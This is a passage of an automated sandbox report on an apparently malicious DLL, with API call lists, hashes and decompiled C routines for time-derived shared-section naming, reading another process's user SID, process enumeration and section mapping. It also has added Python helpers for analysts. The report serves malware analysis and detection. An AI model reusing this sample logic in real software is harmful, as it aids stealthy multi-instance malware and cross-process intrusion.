                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C15FE6
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C16007
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01C1602E
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01C16042
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01C1604F
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1606D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID: Ut
                • API String ID: 3239747167-8415677
                • Opcode ID: 82917160d52b9b2a160e1341f8aa541b6ee2ae88f70a38108f6aa1caeb05b371
                • Instruction ID: 91fadf4ed550c3eb56d2217b706de1e26511bb862145e1fbd4b769cab9de2b75
                • Opcode Fuzzy Hash: 82917160d52b9b2a160e1341f8aa541b6ee2ae88f70a38108f6aa1caeb05b371
                • Instruction Fuzzy Hash: 20315E71A40219EFDB21DFA9DD80BAEBBF9FB5A710F104029E506D3214D771DE00AB14
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 74%
                			// Attaches to a named 4 KiB section whose name is derived from the current time.
                			// On success *_a4 receives the section handle and *_a8 the mapped view and the
                			// function returns 0; otherwise a Win32 error code (2 when the section did not already exist).
                			E01C130FD(intOrPtr __edx, void** _a4, void** _a8) {
                				intOrPtr _v8;                  // high DWORD of the FILETIME
                				struct _FILETIME* _v12;        // low DWORD of the FILETIME, later the quotient
                				short _v56;                    // wide-character name buffer, 0x16 characters
                				struct _FILETIME* _t12;
                				intOrPtr _t13;
                				void* _t17;
                				void* _t21;
                				intOrPtr _t27;
                				long _t28;
                				void* _t30;
                
                				_t27 = __edx;
                				_t12 =  &_v12;
                				GetSystemTimeAsFileTime(_t12);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v8);
                				_push(_v12);
                				L01C18076();                                   // _aulldiv(filetime, 0x19254D38000): 1,728,000,000,000 x 100 ns = 48 h, so the quotient changes every two days
                				_push(_t12);
                				_v12 = _t12;
                				_t13 =  *0x1c1a2d8; // 0x55d5a8
                				_t5 = _t13 + 0x1c1b876; // 0x2178e1e: format string for _snwprintf (in the data section, not shown in this report)
                				_t6 = _t13 + 0x1c1b59c; // 0x530025: string argument for _snwprintf (likewise not shown)
                				_push(0x16);
                				_push( &_v56);
                				_v8 = _t27;
                				L01C17D5A();                                   // _snwprintf(&_v56, 0x16, fmt, ...): builds the section name from the time quotient
                				_t17 = CreateFileMappingW(0xffffffff, 0x1c1a304, 4, 0, 0x1000,  &_v56); // executed: pagefile-backed, PAGE_READWRITE, 0x1000 bytes, SECURITY_ATTRIBUTES at 0x1c1a304
                				_t30 = _t17;
                				if(_t30 == 0) {
                					_t28 = GetLastError();
                				} else {
                					if(GetLastError() == 0xb7) {               // ERROR_ALREADY_EXISTS: only attach to a section another instance created
                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed: FILE_MAP_READ | FILE_MAP_WRITE
                						if(_t21 == 0) {
                							_t28 = GetLastError();
                							if(_t28 != 0) {
                								goto L6;
                							}
                						} else {
                							 *_a4 = _t30;
                							 *_a8 = _t21;
                							_t28 = 0;
                						}
                					} else {
                						_t28 = 2;                              // ERROR_FILE_NOT_FOUND: the section was freshly created, so closing the handle discards it
                						L6:
                						CloseHandle(_t30);
                					}
                				}
                				return _t28;
                			}

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53,?,?), ref: 01C13109
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 01C1311F
                • _snwprintf.NTDLL ref: 01C13144
                • CreateFileMappingW.KERNELBASE(000000FF,01C1A304,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 01C13160
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53,?), ref: 01C13172
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01C13189
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53), ref: 01C131AA
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53,?), ref: 01C131B2
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: aeacd21842989741d188ea053d0ac020343dbe8861720018c69260c84925a1d2
                • Instruction ID: a648de3298942412a60b8bdf80e157fec9828fb9334ce503a766345a5dfb9744
                • Opcode Fuzzy Hash: aeacd21842989741d188ea053d0ac020343dbe8861720018c69260c84925a1d2
                • Instruction Fuzzy Hash: B121EB766C0204FBE721DFA8CC05F8D77B9BB5A764F204021FA06E7198D670D6059B51
                Uniqueness

                Uniqueness Score: -1.00%
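                Added example for E01C130FD above; this is not code from the sample or from Joe Sandbox. It reproduces the time arithmetic that seeds the section name (FILETIME divided by 0x19254D38000) so an analyst can tell how long a name observed in one run stays valid and when it rolls over. The _snwprintf format string lives in the sample's data section and is not visible in the report, so only the numeric seed is computed here; the name itself is deliberately not reconstructed.

```python
"""Time bucket behind the section name in E01C130FD.
Added example: not code from the analysed sample or from Joe Sandbox."""
from datetime import datetime, timedelta, timezone

DIVISOR = 0x19254D38000                      # second operand of the _aulldiv call
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HUNDRED_NS_PER_SECOND = 10_000_000


def to_filetime(dt: datetime) -> int:
    """Windows FILETIME: 100-nanosecond intervals since 1601-01-01 UTC."""
    delta = dt - FILETIME_EPOCH
    whole_seconds = delta.days * 86_400 + delta.seconds
    return whole_seconds * HUNDRED_NS_PER_SECOND + delta.microseconds * 10


def seed_for(dt: datetime) -> int:
    """The quotient the sample passes on to _snwprintf: FILETIME // 0x19254D38000."""
    return to_filetime(dt) // DIVISOR


def bucket_length() -> timedelta:
    """How long one seed value stays valid (the divisor expressed as a duration)."""
    return timedelta(seconds=DIVISOR // HUNDRED_NS_PER_SECOND)


def next_rollover(dt: datetime) -> datetime:
    """First instant at which seed_for() differs from seed_for(dt)."""
    ft = (seed_for(dt) + 1) * DIVISOR
    seconds, remainder = divmod(ft, HUNDRED_NS_PER_SECOND)
    return FILETIME_EPOCH + timedelta(seconds=seconds, microseconds=remainder // 10)


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    print("bucket length:", bucket_length())
    print("current seed :", seed_for(now))
    print("rolls over at:", next_rollover(now).isoformat())
```

Because the seed is a plain integer division of the clock, every instance of the sample started within the same 48-hour window computes the same name, which is what lets the ERROR_ALREADY_EXISTS check in E01C130FD find a section created by an earlier instance.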

                Control-flow Graph

                Control-flow graph (drawn as an image in the report; node list recovered from it): basic blocks 46c8c50 to 46c8d92. Blocks and the calls they make: 46c8c72 call 46d28fe; 46c8c88 StrRChrA; 46c8ca1 _strupr, lstrlen, call 46dd697; 46c8cc2 call 46cd4f4; 46c8d19 CreateEventA; 46c8d39 call 46c34ea; 46c8d4b RtlAddVectoredExceptionHandler; 46c8d5c call 46d4560; 46c8d6b GetLastError; 46c8d80 RtlRemoveVectoredExceptionHandler; exit at 46c8d8d. No decompiled C code is given for this function.
                APIs
                • StrRChrA.SHLWAPI(04C9B5B0,00000000,0000005C,?,?,?), ref: 046C8C8C
                • _strupr.NTDLL ref: 046C8CA2
                • lstrlen.KERNEL32(04C9B5B0,?,?), ref: 046C8CAA
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 046C8D2A
                • RtlAddVectoredExceptionHandler.NTDLL(00000000,046C44E1), ref: 046C8D51
                • GetLastError.KERNEL32(?,?,?,?), ref: 046C8D6B
                • RtlRemoveVectoredExceptionHandler.NTDLL(01333FC8), ref: 046C8D81
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                • String ID:
                • API String ID: 2251957091-0
                • Opcode ID: 339fc4df15e163c317b553158e81bb5e1af5214e6ac8b1d3432c5617b0d9312a
                • Instruction ID: e372b62e0cca21f5f8f666385f0edb9bf3da6dfc6c7834be060a40331dadb117
                • Opcode Fuzzy Hash: 339fc4df15e163c317b553158e81bb5e1af5214e6ac8b1d3432c5617b0d9312a
                • Instruction Fuzzy Hash: E031D8729002519FE730BF75D88897E77E5E724315B15552FE912DB281F63ABC808B90
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 38%
                			// Reads the user SID of another process: opens the process by id (_a4), opens its
                			// token, queries TokenUser and copies 0x1c bytes of the SID to _a8.
                			// Returns 1 on success, 0 otherwise.
                			E01C1373D(char _a4, void* _a8) {
                				void* _v8;                 // token handle
                				void* _v12;                // process handle
                				char _v16;
                				void* _v20;                // CLIENT_ID: UniqueProcess = _a4, UniqueThread = 0
                				char _v24;
                				char _v28;
                				char _v32;
                				char _v36;
                				char _v40;
                				void* _v44;                // OBJECT_ATTRIBUTES with Length = 0x18 and every other field zero
                				void** _t33;
                				void* _t40;
                				void* _t43;
                				void** _t44;
                				intOrPtr* _t47;
                				char _t48;
                
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v20 = _a4;
                				_t48 = 0;
                				_v16 = 0;
                				_a4 = 0;                                       // reused below as the TOKEN_USER buffer length
                				_v44 = 0x18;
                				_v40 = 0;
                				_v32 = 0;
                				_v36 = 0;
                				_v28 = 0;
                				_v24 = 0;
                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {   // PROCESS_QUERY_INFORMATION
                					_t33 =  &_v8;
                					__imp__(_v12, 8, _t33);                    // NtOpenProcessToken(hProcess, TOKEN_QUERY, &hToken)
                					if(_t33 >= 0) {
                						_t47 = __imp__;                        // NtQueryInformationToken
                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed: TokenUser with a NULL buffer, only to learn the required size
                						_t44 = E01C12114(_a4);                 // heap allocation of that size (wraps RtlAllocateHeap)
                						if(_t44 != 0) {
                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed: TokenUser for real
                							if(_t40 >= 0) {
                								memcpy(_a8,  *_t44, 0x1c);     // *_t44 = TOKEN_USER.User.Sid; 0x1c bytes is exactly a SID with 5 sub-authorities (S-1-5-21-x-y-z-rid), longer SIDs are truncated
                								_t48 = 1;
                							}
                							E01C12C11(_t44);                   // release the buffer
                						}
                						NtClose(_v8); // executed
                					}
                					NtClose(_v12);
                				}
                				return _t48;
                			}

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01C13784
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 01C13797
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01C137B3
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01C137D0
                • memcpy.NTDLL(?,00000000,0000001C), ref: 01C137DD
                • NtClose.NTDLL(?), ref: 01C137EF
                • NtClose.NTDLL(00000000), ref: 01C137F9
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 6208c4a888f0770bc872d3ebd2d864ab46542e48e3c115c03e7c76987b594c56
                • Instruction ID: 2d7ea102a881641710fe7d4d2309498472b61ace961f6f130b9ddd3635bdc3f7
                • Opcode Fuzzy Hash: 6208c4a888f0770bc872d3ebd2d864ab46542e48e3c115c03e7c76987b594c56
                • Instruction Fuzzy Hash: CC2157B1940219FBDF10AFA4CD45ADEBFBCFB09764F204066FA01A6154D371CA80ABA0
                Uniqueness

                Uniqueness Score: -1.00%
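                Added example for E01C1373D above; this is not code from the sample or from Joe Sandbox. It decodes the 0x1c bytes the routine copies out of TOKEN_USER.User.Sid into the familiar S-1-5-... form and shows why 0x1c was chosen: it is exactly the size of a SID with five sub-authorities, so a fixed-size copy is lossless for ordinary domain and local user accounts and silently truncates anything longer. The SID values below are constructed, not recovered from the sample.

```python
"""Binary SID decoding for the fixed 0x1c-byte copy made by E01C1373D.
Added example: not code from the analysed sample or from Joe Sandbox."""
import struct

COPY_LEN = 0x1C   # memcpy length in E01C1373D


def sid_length(raw: bytes) -> int:
    """Real size of a SID from its header: 8 fixed bytes + 4 per sub-authority."""
    if len(raw) < 2:
        raise ValueError("SID shorter than its fixed header")
    return 8 + 4 * raw[1]


def parse_sid(raw: bytes) -> str:
    """Render a binary SID as S-R-I-S1-...-Sn, refusing truncated input."""
    if len(raw) < 8:
        raise ValueError("SID shorter than its fixed header")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    authority = int.from_bytes(raw[2:8], "big")          # 48-bit identifier authority, big-endian
    need = sid_length(raw)
    if len(raw) < need:
        raise ValueError(f"SID declares {count} sub-authorities but only {len(raw)} bytes present")
    subs = struct.unpack_from(f"<{count}I", raw, 8)      # sub-authorities are little-endian DWORDs
    return "S-" + "-".join(str(x) for x in (revision, authority, *subs))


def build_sid(authority: int, subs) -> bytes:
    """Encode a SID (used here only to construct test input)."""
    subs = list(subs)
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)


def fits_fixed_copy(raw: bytes, copy_len: int = COPY_LEN) -> bool:
    """True when memcpy(dst, sid, copy_len) preserves the whole SID."""
    return sid_length(raw) <= copy_len


if __name__ == "__main__":
    # Constructed SIDs: a typical domain user, LocalSystem, and a six-sub-authority SID.
    user = build_sid(5, [21, 1111111111, 2222222222, 3333333333, 1001])
    system = build_sid(5, [18])
    long_sid = build_sid(5, [80, 1, 2, 3, 4, 5])
    for sid in (user, system, long_sid):
        print(parse_sid(sid), sid_length(sid), "fits" if fits_fixed_copy(sid) else "truncated")
```

When reading such a copied SID out of a memory dump, check the sub-authority count in byte 1 first: a value above 5 means the 0x1c-byte copy holds only the first five sub-authorities and the string you would derive from it is wrong.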

                Control-flow Graph

                APIs
                • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 046CD53B
                • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 046CD54E
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 046CD56A
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 046CD587
                • memcpy.NTDLL(?,00000000,0000001C), ref: 046CD594
                • NtClose.NTDLL(?), ref: 046CD5A6
                • NtClose.NTDLL(?), ref: 046CD5B0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 33891198bd0de8dcbb8e9eac5d6762f96271eaed603456006a17f85de33448c0
                • Instruction ID: 1a0129707ca9ae8520687cf96767656ffa9ded371a24be3be229b4de07c81f0b
                • Opcode Fuzzy Hash: 33891198bd0de8dcbb8e9eac5d6762f96271eaed603456006a17f85de33448c0
                • Instruction Fuzzy Hash: 48211971900219BFDB01AF95CC459EEBFBDEF48744F10402AF905EA150E7719E419BE0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CAFFC
                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 046CB009
                • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 046CB095
                • GetModuleHandleA.KERNEL32(00000000), ref: 046CB0A0
                • RtlImageNtHeader.NTDLL(00000000), ref: 046CB0A9
                • RtlExitUserThread.NTDLL(00000000), ref: 046CB0BE
                  • Part of subcall function 046E3AA2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,046CB037,?), ref: 046E3AAA
                  • Part of subcall function 046E3AA2: GetVersion.KERNEL32 ref: 046E3AB9
                  • Part of subcall function 046E3AA2: GetCurrentProcessId.KERNEL32 ref: 046E3AD0
                  • Part of subcall function 046E3AA2: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 046E3AED
                  • Part of subcall function 046D7B55: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,?,046CB045,?), ref: 046D7BB4
                  • Part of subcall function 046CE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,046DBCFE), ref: 046CE9D6
                  • Part of subcall function 046CAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,046C1DC6,00000000), ref: 046CAEE6
                  • Part of subcall function 046CAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 046CAEFF
                  • Part of subcall function 046CAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF1C
                  • Part of subcall function 046CAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF2D
                  • Part of subcall function 046CAEC5: CloseHandle.KERNEL32(?,?,?,?,046C1DC6,00000000), ref: 046CAF40
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                • String ID:
                • API String ID: 3675227105-0
                • Opcode ID: a5944e0850e3dcc9a0f1c17aabbe09576df9ee6b83c6cf4f412dff5bd3481e90
                • Instruction ID: 3e117e3b9eee62786168a8d35b4289765dae2c322ac9a780ea767c023e659f35
                • Opcode Fuzzy Hash: a5944e0850e3dcc9a0f1c17aabbe09576df9ee6b83c6cf4f412dff5bd3481e90
                • Instruction Fuzzy Hash: 60318071A00218AFDB21EF69EC85ABE77B4FF44B54B10412DE521EB241F635AE44CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,046C48CA,00000800,?,?,00000000,00000000), ref: 046CAA3F
                  • Part of subcall function 046C87CD: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,046CA90D,?,?,?,00000000,00000000), ref: 046C87F2
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C8814
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C882A
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C8840
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C8856
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C886C
                  • Part of subcall function 046D0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,046DBF30,00000000,00000000,046DBF30,00000000,00000002,00000000,?,?,00000000,046DBF30,000000FF,00000000), ref: 046D100E
                  • Part of subcall function 046E3C23: memcpy.NTDLL(?,?,?,?,?,?,046CC6EC,046CC6EC,?,?,?,00000000,00000000), ref: 046E3C89
                  • Part of subcall function 046E3C23: memcpy.NTDLL(00000000,?,?), ref: 046E3CE8
                • memcpy.NTDLL(?,?,?,?,?,046CC6EC,046CC6EC,046CC6EC,?,?,?,00000000,00000000), ref: 046CA96C
                • memcpy.NTDLL(?,?,00000018,?,?,046CC6EC,046CC6EC,046CC6EC,?,?,?,00000000,00000000), ref: 046CA9B8
                • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 046CAA7D
                • memset.NTDLL ref: 046CAABF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                • String ID:
                • API String ID: 1575695328-0
                • Opcode ID: b44e2035739a7c9fb8cf1b2b768052d43b04829b689627cf8a767c85ea4049ea
                • Instruction ID: 1c6ee3d8005e8d4910ec8bcc724e3ac268756302d98810096be00fe4697aa3c9
                • Opcode Fuzzy Hash: b44e2035739a7c9fb8cf1b2b768052d43b04829b689627cf8a767c85ea4049ea
                • Instruction Fuzzy Hash: 41912471A0120AEFDB10DFD9CA84BAEBBB4FF08304F14456DE801A7250E775BA95DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E01C12130() {
                				char _v264;
                				void* _v300;
                				void* _t5;
                				int _t8;
                				intOrPtr _t9;
                				int _t15;
                				void* _t17;
                
                				_t15 = 0;
                				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                				_t17 = _t5;
                				if(_t17 != 0) {
                					_t8 = Process32First(_t17,  &_v300);
                					while(_t8 != 0) {
                						_t9 =  *0x1c1a2d8; // 0x55d5a8
                						_t2 = _t9 + 0x1c1beb0; // 0x73617661
                						_push( &_v264);
                						if( *0x1c1a118() != 0) {
                							_t15 = 1;
                						} else {
                							_t8 = Process32Next(_t17,  &_v300);
                							continue;
                						}
                						L7:
                						CloseHandle(_t17);
                						goto L8;
                					}
                					goto L7;
                				}
                				L8:
                				return _t15;
                			}


                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01C12140
                • Process32First.KERNEL32(00000000,?), ref: 01C12153
                • Process32Next.KERNEL32(00000000,?), ref: 01C1217F
                • CloseHandle.KERNEL32(00000000), ref: 01C1218E
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: 440df82f9396561353b4667055d85a4a6bf9420a86ddb52a0e06a3768f00dace
                • Instruction ID: 227e2059961bf95eb6b6ee01c70a6a2b7dc412f7be22ef82dd0c222cb222ab48
                • Opcode Fuzzy Hash: 440df82f9396561353b4667055d85a4a6bf9420a86ddb52a0e06a3768f00dace
                • Instruction Fuzzy Hash: 79F0F63A181165EAD721E6A68C88FEB366CEB97350F200051EA19C3008EA34CF59A7A1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 046DBF19
                  • Part of subcall function 046D0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,046DBF30,00000000,00000000,046DBF30,00000000,00000002,00000000,?,?,00000000,046DBF30,000000FF,00000000), ref: 046D100E
                • memset.NTDLL ref: 046DBF3D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction ID: 193bf6ddebbeb506bf7ca1502c451896bbbb6beec78e1f5174dcef0986745069
                • Opcode Fuzzy Hash: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction Fuzzy Hash: 18210E75D00209AFDB11DFA9C8849EEFBF9EB48354F108569E615F3250E730AA458F64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetProcAddress.KERNEL32(?,00000318), ref: 046CE501
                • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 046CE51D
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                  • Part of subcall function 046CB45A: GetProcAddress.KERNEL32(?,00000000), ref: 046CB483
                  • Part of subcall function 046CB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,046CE55E,00000000,00000000,00000028,00000100), ref: 046CB4A5
                • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 046CE687
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                • String ID:
                • API String ID: 3547194813-0
                • Opcode ID: 6bd0410efdc445ff453f38c00394c00ecf1f3c751217fd3cf8b90a3db31406d3
                • Instruction ID: 34be963d613732f087f8998398d5ae2cb828dd39d45d76379b2e0950e9ca5b0b
                • Opcode Fuzzy Hash: 6bd0410efdc445ff453f38c00394c00ecf1f3c751217fd3cf8b90a3db31406d3
                • Instruction Fuzzy Hash: D0613A70A1020AAFDB14DFA5C980BAEBBB4FF18304F10446DE905AB391E771E954CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046C6F84
                • GetProcAddress.KERNEL32(?), ref: 046C6FAC
                • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 046C6FCA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressInformationProcProcess64QueryWow64memset
                • String ID:
                • API String ID: 2968673968-0
                • Opcode ID: 0fd232cd2b48c39db882856321d4ce8b64eb53000ef3db4d001c4aab52df2473
                • Instruction ID: 8bafe62255e026abc750011fa5ceddbbae96ad6b14558bd5247daa1081dd18fa
                • Opcode Fuzzy Hash: 0fd232cd2b48c39db882856321d4ce8b64eb53000ef3db4d001c4aab52df2473
                • Instruction Fuzzy Hash: B4115E31A00219AFEB10DF99DC49FA977E9EB44700F054029F904EB291FB75ED05CB65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtAllocateVirtualMemory.NTDLL(046D6359,00000000,00000000,046D6359,00003000,00000040), ref: 046E3EAE
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046E3EB5
                • SetLastError.KERNEL32(00000000), ref: 046E3EBC
                Memory Dump Source
